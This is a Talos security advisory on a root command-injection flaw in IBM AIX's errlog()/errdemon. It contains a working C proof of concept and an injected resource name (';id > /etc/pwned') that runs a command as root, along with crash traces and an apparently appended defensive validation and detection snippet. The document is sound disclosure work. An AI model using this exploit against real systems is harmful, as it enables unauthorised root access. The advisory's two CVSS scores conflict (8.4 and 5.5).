IBM Corporation AIX errlog() Log Injection Vulnerability

2023-04-24 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS3: 8.4 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: LOCAL; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

EPSS: 0.0004 Low (percentile 5.1%)

Talos Vulnerability Report

TALOS-2023-1690

IBM Corporation AIX errlog() Log Injection Vulnerability

April 24, 2023
CVE Number

None, CVE-2023-26286

SUMMARY

An OS command injection vulnerability exists in the errlog() syscall functionality of IBM Corporation AIX 7.2. A specially crafted syscall can lead to the execution of a privileged operation. An attacker can execute arbitrary commands by triggering this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

IBM Corporation AIX 7.2

PRODUCT URLS

AIX - <http://us.ibm.com>

CVSSv3 SCORE

5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-117 - Improper Output Neutralization for Logs

DETAILS

AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.

Research into the attack surface presented by the errlog() syscall has identified 3 potential areas of concern.

It should be noted that these events will likely be onboarded into the system operator’s wider monitoring infrastructure. Being able to inject arbitrary events will allow attackers to actively mislead defenders as to the current operational state of the platform.

#### Malformed input leading to memory corruption

Certain combinations of values supplied in the err_rec structure via the error_id, resource_name and detail_data properties to the errlog() syscall can result in out-of-bounds memory access when the events are processed by the errdemon process.

Crash Information

```
…
LABEL:          CORE_DUMP
IDENTIFIER:     A924A5FC

Date/Time:       Mon Mar 23 23:54:21 BST 2020
Sequence Number: 22952
Machine Id:      00CA1BFD4C00
Node Id:         beehive
Class:           S
Type:            PERM
WPAR:            Global
Resource Name:   SYSPROC

Description
SOFTWARE PROGRAM ABNORMALLY TERMINATED

Probable Causes
SOFTWARE PROGRAM

User Causes
USER GENERATED SIGNAL

Recommended Actions
CORRECT THEN RETRY

Failure Causes
SOFTWARE PROGRAM

Recommended Actions
RERUN THE APPLICATION PROGRAM
IF PROBLEM PERSISTS THEN DO THE FOLLOWING
CONTACT APPROPRIATE SERVICE REPRESENTATIVE

Detail Data
SIGNAL NUMBER
11
USER'S PROCESS ID:
7929890
FILE SYSTEM SERIAL NUMBER
4
INODE NUMBER
0 4
CORE FILE NAME
/var/adm/ras/core
PROGRAM NAME
lfailaiocachelv
STACK EXECUTION DISABLED
0
COME FROM ADDRESS REGISTER

PROCESSOR ID
hw_fru_id: 0
hw_cpu_id: 0

ADDITIONAL INFORMATION
strlen 0
_doprnt 7574
vsnprintf 150
lvmt_entr 104
lvmt 124
main 784
__start 6C

Symptom Data
REPORTABLE
1
INTERNAL ERROR
1
SYMPTOM CODE
PIDS/5765E6200 LVLS/520 PCSS/SPI2 FLDS/lfailaioc SIG/11 FLDS/strlen VALU/0 FLDS/main
---------------------------------------------------------------------------
LABEL:          LVM_CLV_FAIL_DONE
IDENTIFIER:     30097641

Date/Time:       Tue Mar 24 00:06:35 BST 2020
Sequence Number: 22981
Machine Id:      00CA1BFD4C00
Node Id:         beehive
Class:           S
Type:            INFO
WPAR:            Global
Resource Name:   M6UHAE3).JSJXRD$NONE

Description
AIO CACHE FAIL RECOVERY DONE

Recommended Actions
If asynchronous IO cache is marked as invalid then using chmp command
disable the asynchronous mirroring for a volume group.
Synchronize all the logical volume copies.
Delete a old aio_cache type logical volume.
Create a new aio_cache type logical volume.
Setup an asynchronous mirroring using new aio_cache type logical volume.

Detail Data
AIO CACHE DEVICE MAJOR/MINOR

MIRROR POOL ID

VOLUME GROUP ID
```

Output from truss for the crash is as follows:

```
7929890: 42664157: kopen("/var/adm/ras/errlog", O_RDONLY) = 5
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, " a e r r l o g r\0\0\0 ▒".., 32) = 32
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: _lockf(5, 1, 0) Err#9 EBADF
7929890: 42664157: lseek(5, 0, 0) = 0
7929890: 42664157: kread(5, " a e r r l o g r\0\0\0 ▒".., 32) = 32
7929890: 42664157: lseek(5, 281112, 0) = 281112
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: 42664157: lseek(5, 276857, 0) = 276857
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: 42664157: kread(5, "\f M ▒ 4\0\0 Y ▒ ^ y >1D".., 4255) = 4255
7929890: 42664157: lseek(5, 276853, 0) = 276853
7929890: 42664157: kread(5, "\0\010 ▒", 4) = 4
7929890: Received signal #11, SIGSEGV [default]
7929890:    *** process killed ***
```

#### CVE-2023-26286 - Malformed input leading to direct command injection

The most critical vulnerability can be triggered with the example code in the proof of concept below, which generates an error with an ID of `ERRID_CORRUPT_LOG` and a `resource_name` of `;id > /etc/pwned`. The resource name is used by `errdemon` when it processes events that have been written to `/dev/error`.

As can be seen in the snippet below, taken from a truss-based recording of the errdemon process's activity, the supplied resource name is used verbatim to construct the command string passed to `execve()`. Because errdemon runs as root, the injected command is executed as the root user:

```
execve("/usr/bin/sh", …);
    argv: sh -c /usr/lib/physloc ;id > /etc/pwned
```

#### Exploit Proof of Concept

The most trivial method of exploitation to gain command execution takes the following form:

```c
#include <string.h>
#include <sys/errids.h>
#include <sys/err_rec.h>

int main(int argc, char **argv)
{
    struct err_rec mal_rec;

    if (argc < 2)
        return 1;

    /* This can be any valid error ID that has been registered, but the
     * choice can affect how the event is processed by errdemon. */
    mal_rec.error_id = ERRID_CORRUPT_LOG;

    /* The resource name is taken unmodified from the command line. */
    strcpy(mal_rec.resource_name, argv[1]);

    errlog((void *) &mal_rec, sizeof(unsigned int) + ERR_NAMESIZE);
    return 0;
}
```

Once the event has been submitted with `errlog()`, it is then exposed on `/dev/error` for processing.

For example:

```
./logpop ";id > /etc/pwned"
```

This results in `/etc/pwned` being created with root privileges and populated with the output of the `id` command when the event is processed by `errdemon`.
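As an added illustration (not AIX, errdemon or Talos code) of the defensive side of both the command-injection mechanism above and the monitoring concern raised under DETAILS, the block below shows an allow-list check for an `err_rec` resource name, an argv-based way of invoking the helper that never goes through `sh -c`, and a scan of errpt-style text for resource names that fail the check. The value 16 for `ERR_NAMESIZE`, the allowed character set and the helper path handling are assumptions.

```c
#include <ctype.h>
#include <string.h>

/* Illustration only, not AIX or errdemon code. ERR_NAMESIZE is the AIX
 * constant named in the advisory; the value 16 here is an assumption. */
#define ERR_NAMESIZE 16

/* Allow-list check for an err_rec resource_name: non-empty, fits the field,
 * and only characters seen in real names (hdisk0, SYSPROC, ent1, ...). */
int resource_name_is_safe(const char *name)
{
    size_t n = 0;
    for (; name[n] != '\0'; n++) {
        unsigned char c = (unsigned char)name[n];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;                 /* ';', '>', '$', ')' ... are rejected */
        if (n + 1 > ERR_NAMESIZE) return 0;  /* would overrun resource_name[] */
    }
    return n > 0;
}

/* Hardened alternative to "sh -c /usr/lib/physloc <name>": validate, then pass
 * the name as one argv element (for execv/posix_spawn) so no shell parses it. */
int build_helper_argv(const char *name, const char *argv[3])
{
    if (!resource_name_is_safe(name)) return 0;
    argv[0] = "/usr/lib/physloc";
    argv[1] = name;
    argv[2] = NULL;
    return 1;
}

/* Detection over errpt -a style text: count "Resource Name:" values that fail
 * the allow-list; an injected event like the one in this report stands out. */
int count_suspicious_resource_lines(const char *text)
{
    static const char key[] = "Resource Name:";
    int hits = 0;
    for (const char *p = strstr(text, key); p != NULL; p = strstr(p, key)) {
        char name[64];
        size_t n = 0;
        p += sizeof key - 1;
        while (*p == ' ' || *p == '\t') p++;            /* skip padding */
        while (*p != '\0' && *p != '\n' && n < sizeof name - 1)
            name[n++] = *p++;                            /* copy the value */
        name[n] = '\0';
        if (!resource_name_is_safe(name)) hits++;
    }
    return hits;
}
```

The sample lines used in testing are constructed from the errpt excerpt in this report; in practice the scan would run over `errpt -a` output or the events forwarded to a SIEM.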

##### TIMELINE

2023-01-09 - Initial Vendor Contact   
2023-01-16 - Vendor Disclosure   
2023-04-13 - Vendor Patch Release   
2023-04-24 - Public Release

##### Credit

Discovered by Tim Brown of Cisco Security Advisory EMEAR.
